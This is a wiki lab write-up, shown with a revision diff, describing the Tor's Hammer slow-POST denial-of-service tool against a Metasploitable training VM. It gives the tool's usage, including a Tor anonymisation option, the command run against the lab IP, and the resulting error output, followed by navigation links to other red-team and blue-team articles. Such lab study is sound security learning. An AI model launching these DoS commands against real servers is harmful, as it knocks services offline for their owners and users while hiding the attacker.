Metasploitable/TorsHammer: Difference between revisions
From charlesreid1
| Line 40: | Line 40: | ||
==Results== | ==Results== | ||
This works like a charm: | This works like a charm, bringing the target 10.0.0.27 to its knees: | ||
[[Image:TorsHammer.png|500px]] | [[Image:TorsHammer.png|500px]] | ||
Revision as of 03:55, 29 March 2016
Tor's Hammer Slow Body DoS Attack
Tor's Hammer (https://sourceforge.net/projects/torshammer/) is a tool that uses the slow body attack to swamp Apache servers and cause a denial of service (DoS). It does this by sending a POST request with a large declared content-length, then sending data one bit at a time.
Tor's Hammer, in particular, provides a Python script that enables running the slow body attack through a web proxy like Tor, to provide anonymity. It also implements other disguising elements like a slew of User Agent headers.
We'll test this tool out on the Metasploitable machine, which is running Apache 2.2.8, and see if it is vulnerable to the Tor's Hammer DoS attack. If so, we'll mount the attack.
Python Script
To run this attack, use the torshammer.py script from the link above.
$ python torshammer.py /* * Tor's Hammer * Slow POST DoS Testing Tool * Version 1.0 Beta * Anon-ymized via Tor */ ./torshammer.py -t <target> [-r <threads> -p <port> -T -h] -t|--target <Hostname|IP> -r|--threads <Number of threads> Defaults to 256 -p|--port <Web Server Port> Defaults to 80 -T|--tor Enable anonymising through tor on 127.0.0.1:9050 -h|--help Shows this help Eg. ./torshammer.py -t 192.168.1.100 -r 256
Run this agains the IP address of the Metasploitable machine, 10.0.0.27:
# python torshammer.py -t 10.0.0.27
This will run with the default number of threads (256).
Results
This works like a charm, bringing the target 10.0.0.27 to its knees:
Bingo!
Note that there are a large number of errors printed,
error: [Errno 24] Too many open files Thread broken, restarting... Exception in thread Thread-1: Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner File "torshammer.py", line 112, in run File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__ File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__ error: [Errno 24] Too many open files Thread broken, restarting... Exception in thread Thread-65: Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner File "torshammer.py", line 112, in run File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__ File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__ error: [Errno 24] Too many open files Thread broken, restarting... Exception in thread Thread-17: Traceback (most recent call last): File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner File "torshammer.py", line 112, in run File "/Volumes/noospace/Users/charles/Downloads/Torshammer 1.0/socks.py", line 126, in __init__ File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 191, in __init__
However, these don't seem to affect the attack, as the web server is inaccessible even while the error messages are being printed out.
Flags
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|